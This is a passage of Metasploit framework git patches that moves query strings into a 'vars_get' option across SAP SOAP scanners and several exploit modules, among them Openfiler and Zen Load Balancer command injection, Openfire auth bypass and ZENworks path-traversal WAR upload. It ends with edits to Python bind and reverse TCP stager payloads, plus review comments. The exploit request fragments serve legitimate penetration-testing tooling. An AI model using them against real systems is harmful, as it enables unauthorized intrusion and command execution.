@@ -112,12 +112,16 @@ class ClientRequest opts['vars_get'].each_pair do |var,val| var = var.to_s - val = val.to_s qstr << '&' if qstr.length > 0 qstr << (opts['encode_params'] ? set_encode_uri(var) : var) - qstr << '=' - qstr << (opts['encode_params'] ? set_encode_uri(val) : val) + # support get paraemter without value + # Example: uri?parameter + if val + val = val.to_s + qstr << '=' + qstr << (opts['encode_params'] ? set_encode_uri(val) : val) + end end if (opts['pad_post_params']) diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 7a9535e6a9..ca96bb83eb 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -70,17 +70,21 @@ class Metasploit4 < Msf::Auxiliary data << '</env:Envelope>' begin print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'") + res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } }) if res and res.code == 200 if res.body =~ /<h1>Logon failed<\/h1>/ diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb index d19a43b7c7..142697e92b 100644 
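Review bot: In lib/rex/proto/http/client_request.rb, `if val` skips the `=value` part for `false` as well as for nil, so a caller passing `false` as a value now gets a bare parameter name where the old code sent `name=false`. If only nil is meant to mark a value-less parameter, test for it explicitly: `unless val.nil?`. The new comment also has a typo and could read `# support GET parameters without a value, e.g. uri?parameter`. The surrounding method starts and ends outside the hunk.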
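Review bot: The request options added in sap_soap_bapi_user_create1.rb (`'uri' => '/sap/bc/soap/rfc'`, the `sap-usercontext` cookie, the `SOAPAction` header and the `vars_get` pair) are copied unchanged into the other SAP SOAP modules touched by this commit, from sap_soap_rfc_brute_login.rb through sap_soap_th_saprel_disclosure.rb. The copies have already drifted in small ways, for example `'headers' =>{` in some files and `'headers' => {` in others. One shared mixin method that takes the client, the credentials and the SOAP body and returns the options hash would leave a single place to change next time. The enclosing method is only partly visible in each hunk.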
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb @@ -118,16 +118,19 @@ class Metasploit4 < Msf::Auxiliary data << '</env:Envelope>' begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client, + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(username, password), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => client, + 'sap-language' => 'EN' + } }) if res and res.code == 200 report_auth_info( diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb index 72460a04fc..c20283e921 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb 
@@ -93,14 +93,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_CALL_SYSTEM request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb index b8ec123d75..fc110dbd7b 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb @@ -94,14 +94,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res 
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb index ec95f65519..be20e21b59 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb @@ -62,17 +62,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_PING request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client, + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}", 'data' => data, 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'ctype' => 'text/xml; charset=UTF-8', - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' - } - }) + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' + }, + 'vars_get' => { + 'sap-client' => client, + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 if res and res.body =~ /<h1>Logon failed<\/h1>/ print_error("[SAP] #{ip}:#{rport} - login failed!") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb index d7e7ad065b..3d19045911 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb 
@@ -83,19 +83,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_READ_TABLE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'ctype' => 'text/xml; charset=UTF-8', - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - #'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], - #'Authorization' => 'Basic ' + user_pass, - #'Content-Type' => - } - }) + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 # to do - implement error handlers for each status code, 404, 301, etc. if res.body =~ /<h1>Logon failed<\/h1>/ diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb index f60e420352..d8f0f2ba23 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb 
@@ -70,17 +70,20 @@ class Metasploit4 < Msf::Auxiliary begin vprint_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'") res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' - } - }) + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code == 200 if res.body =~ /<h1>Logon failed<\/h1>/ vprint_error("[SAP] #{ip}:#{rport} - Logon failed") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb index bab5a4f4c7..33c040c8ac 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb 
@@ -73,16 +73,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } - }) + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 # to do - implement error handlers for each status code, 404, 301, etc. print_error("[SAP] #{ip}:#{rport} - something went wrong!") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb index 977001c395..7b2aad3ebe 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb 
@@ -73,14 +73,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' =>{ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 0677878b96..db2a26bf6e 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -89,14 +89,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_SYSTEM_INFO request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' =>{ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 
diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb index d02719355c..4695780832 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb @@ -64,14 +64,18 @@ class Metasploit4 < Msf::Auxiliary begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code == 200 diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index b1542c492e..d979506f7a 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -103,8 +103,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ - 'uri' => "/admin/system.html?step=2&device=lo#{cmd}", - 'cookie' => "usercookie=#{user}; passcookie=#{pass};", + 'uri' => '/admin/system.html', + 'cookie' => "usercookie=#{user}; passcookie=#{pass};", + 'vars_get' => { + 'step' => '2', + 'device' => "lo#{cmd}" + } }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unknown, 'Connection failed') 
diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb index ffc6163100..3da916023f 100644 --- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb @@ -100,9 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Authenticating as " + datastore['USERNAME']) login = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, '/index.php?c=login'), + 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'login', + } }) if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/ @@ -134,9 +137,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Changing old password hash to notpassword") passchange = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'), + 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'change_password' + } }) if !passchange or passchange.code != 200 @@ -166,9 +172,12 @@ class Metasploit3 < Msf::Exploit::Remote } login = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'index.php?c=login'), + 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'login', + } }) if !login or login.code != 200 or login.body !~ /admin<\/a>/ @@ -192,9 +201,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending payload") send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'), + 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'vars_post' => post, + 'vars_get' => { + 'c' => 'netinterface', + } }) end end 
diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index 96e02f8cbf..71901569d9 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -88,7 +88,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit user = datastore['USERNAME'] pass = datastore['PASSWORD'] - auth = Rex::Text.encode_base64("#{user}:#{pass}") cmd = Rex::Text.uri_encode(";#{payload.encoded}&") lines = rand(100) + 1 @@ -96,11 +95,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)") begin res = send_request_cgi({ - 'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}", - 'headers' => - { - 'Authorization' => "Basic #{auth}" - } + 'uri' => '/index.cgi', + 'authorization' => basic_auth(user, pass), + 'vars_get' => { + 'nlines' => lines, + 'action' => 'See logs', + 'id' => '2-2', + 'filelog' => cmd + } }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unreachable, 'Connection failed') diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index 19c9a442ed..597af3a40a 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb 
@@ -63,13 +63,16 @@ class Metasploit3 < Msf::Exploit::Remote @cookie = "JSESSIONID=#{Rex::Text.rand_text_hex(32)}" res = send_request_cgi({ - 'uri' => normalize_uri(@uri.path, "j_spring_security_check?org.apache.catalina.filters.CSRF_NONCE="), + 'uri' => normalize_uri(@uri.path, 'j_spring_security_check'), 'method' => 'POST', 'cookie' => @cookie, 'vars_post' => { 'j_username' => Rex::Text.uri_encode(user, 'hex-normal'), 'j_password' => Rex::Text.uri_encode(pass, 'hex-normal'), 'submit' => 'Sign+in' + }, + 'vars_get' => { + 'org.apache.catalina.filters.CSRF_NONCE' => '' } }) @@ -81,8 +84,11 @@ class Metasploit3 < Msf::Exploit::Remote # def get_nonce res = send_request_cgi({ - 'uri' => normalize_uri(@uri.path, "mastheadAttach.do?typeId=10003"), - 'cookie' => @cookie + 'uri' => normalize_uri(@uri.path, 'mastheadAttach.do'), + 'cookie' => @cookie, + 'vars_get' => { + 'typeId' => '10003' + } }) if not res or res.code != 200 diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index bc346979d8..874e681659 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -181,15 +181,17 @@ class Metasploit3 < Msf::Exploit::Remote data << "\r\n--#{boundary}--" res = send_request_cgi({ - 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"), + 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), 'method' => 'POST', 'data' => data, - 'headers' => - { - 'Content-Type' => 'multipart/form-data; boundary=' + boundary, - 'Content-Length' => data.length, - 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", - } + 'headers' => { + 'Content-Type' => 'multipart/form-data; boundary=' + boundary, + 'Content-Length' => data.length, + 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", + }, + 'vars_get' => { + 'uploadplugin' => nil + } }) 
@@ -199,11 +201,13 @@ class Metasploit3 < Msf::Exploit::Remote if datastore['REMOVE_PLUGIN'] print_status("Deleting plugin #{plugin_name} from the server") res = send_request_cgi({ - 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase, - 'headers' => - { - 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", - } + 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), + 'headers' => { + 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", + }, + 'vars_get' => { + 'deleteplugin' => plugin_name.downcase + } }) if not res print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.") diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index 9953aa07b0..70988f9cd5 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -64,15 +64,17 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi( { - 'uri' => '/robohelp/server?PUBLISH=' + uid, + 'uri' => '/robohelp/server', 'version' => '1.1', 'method' => 'POST', 'data' => file, - 'headers' => - { - 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid, - 'UID' => uid, - } + 'headers' => { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid, + 'UID' => uid, + }, + 'vars_get' => { + 'PUBLISH' => uid + } }, 5) if ( res and res.message =~ /OK/ ) @@ -80,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Got sessionid of '#{id}'. Sending our second request to '#{page}'...") data = send_request_raw({ - 'uri' => '/robohelp/robo/reserved/web/' + id + '/' + page , + 'uri' => normalize_uri('robohelp', 'robo','reserved', 'web', id, page), 'method' => 'GET', - 'version' => '1.0', + 'version' => '1.0' }, 5) handler 
diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index 7ddae4d011..63f07cc9c6 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -46,10 +46,16 @@ class Metasploit3 < Msf::Exploit::Remote def upload_file(filename, contents) res = send_request_cgi({ - 'uri' => normalize_uri("agentLogUploader?computerName=DesktopCentral&domainName=webapps&customerId=..&filename=#{filename}"), - 'method' => 'POST', - 'data' => contents, - 'ctype' => "text/html" + 'uri' => normalize_uri('agentLogUploader'), + 'method' => 'POST', + 'data' => contents, + 'ctype' => 'text/html', + 'vars_get' => { + 'computerName' => 'DesktopCentral', + 'domainName' => 'webapps', + 'customerId' => '..', + 'filename' => filename + } }) if res and res.code == 200 and res.body.to_s.empty? diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 96f1cb3d2a..14471183de 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -83,9 +83,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") send_request_cgi({ - 'uri' => "/OvCgi/ovalarm.exe?OVABverbose=1", + 'uri' => '/OvCgi/ovalarm.exe', 'method' => "GET", - 'headers' => { 'Accept-Language' => sploit } + 'headers' => { + 'Accept-Language' => sploit + }, + 'vars_get' => { + 'OVABverbose' => '1' + } }, 3) handler diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index 730b89f9a9..0f6fa1e789 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb 
@@ -68,10 +68,13 @@ class Metasploit3 < Msf::Exploit::Remote # Sending the request res = send_request_cgi({ - 'uri' => normalize_uri(datastore['DIR'], '/Login.jsp?') + crash, - 'method' => 'GET', - 'headers' => { - 'Accept' => '*/*', + 'uri' => normalize_uri(datastore['DIR'], 'Login.jsp'), + 'method' => 'GET', + 'headers' => { + 'Accept' => '*/*', + }, + 'vars_get' => { + crash => nil } }, 5) diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 9d675fec6a..728544b5bc 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -66,16 +66,17 @@ class Metasploit3 < Msf::Exploit::Remote war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s - res = send_request_cgi( - { - 'uri' => "/zenworks/UploadServlet?filename=../../webapps/#{app_base}.war", - 'method' => 'POST', - 'data' => war_data, - 'headers' => - { - 'Content-Type' => 'application/octet-stream', - } - }) + res = send_request_cgi({ + 'uri' => '/zenworks/UploadServlet', + 'method' => 'POST', + 'data' => war_data, + 'headers' => { + 'Content-Type' => 'application/octet-stream', + }, + 'vars_get' => { + 'filename' => "../../webapps/#{app_base}.war" + } + }) print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...") diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 64c917fea2..14f13a776d 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -190,6 +190,8 @@ describe Rex::Proto::Http::ClientRequest do 'bar' => 'baz', 'frobnicate' => 'the froozle?', 'foshizzle' => 'my/nizzle', + 'asdf' => nil, + 'test' => '' } end 
@@ -217,6 +219,8 @@ describe Rex::Proto::Http::ClientRequest do str.should include("bar=baz") str.should include("frobnicate=the froozle?") str.should include("foshizzle=my/nizzle") + str.should include("asdf&") + str.should include("test=") end end @@ -229,6 +233,8 @@ describe Rex::Proto::Http::ClientRequest do str.should include("bar=baz") str.should include("frobnicate=the%20froozle%3f") str.should include("foshizzle=my/nizzle") + str.should include("asdf&") + str.should include("test=") end end From b5c567c4628455a5f15c9eb24c224f0fd07c9f37 Mon Sep 17 00:00:00 2001 From: Tom Sellers <tom@fadedcode.net> Date: Sun, 25 May 2014 14:03:45 -0500 Subject: [PATCH 379/853] Update bind_tcp.rb --- modules/payloads/stagers/python/bind_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index cd9422023c..50e8974123 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -32,7 +32,7 @@ module Metasploit3 cmd = '' # Set up the socket cmd += "import socket,struct\n" - cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1 + cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" cmd += "s.listen(1)\n" cmd += "c,a=s.accept()\n" From 77f66f8510fc62eb9e5f7a2e85417f7edc1b84ca Mon Sep 17 00:00:00 2001 From: Tom Sellers <tom@fadedcode.net> Date: Sun, 25 May 2014 14:04:54 -0500 Subject: [PATCH 380/853] Update reverse_tcp.rb --- modules/payloads/stagers/python/reverse_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 765dc00f34..4f741f0c52 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb 
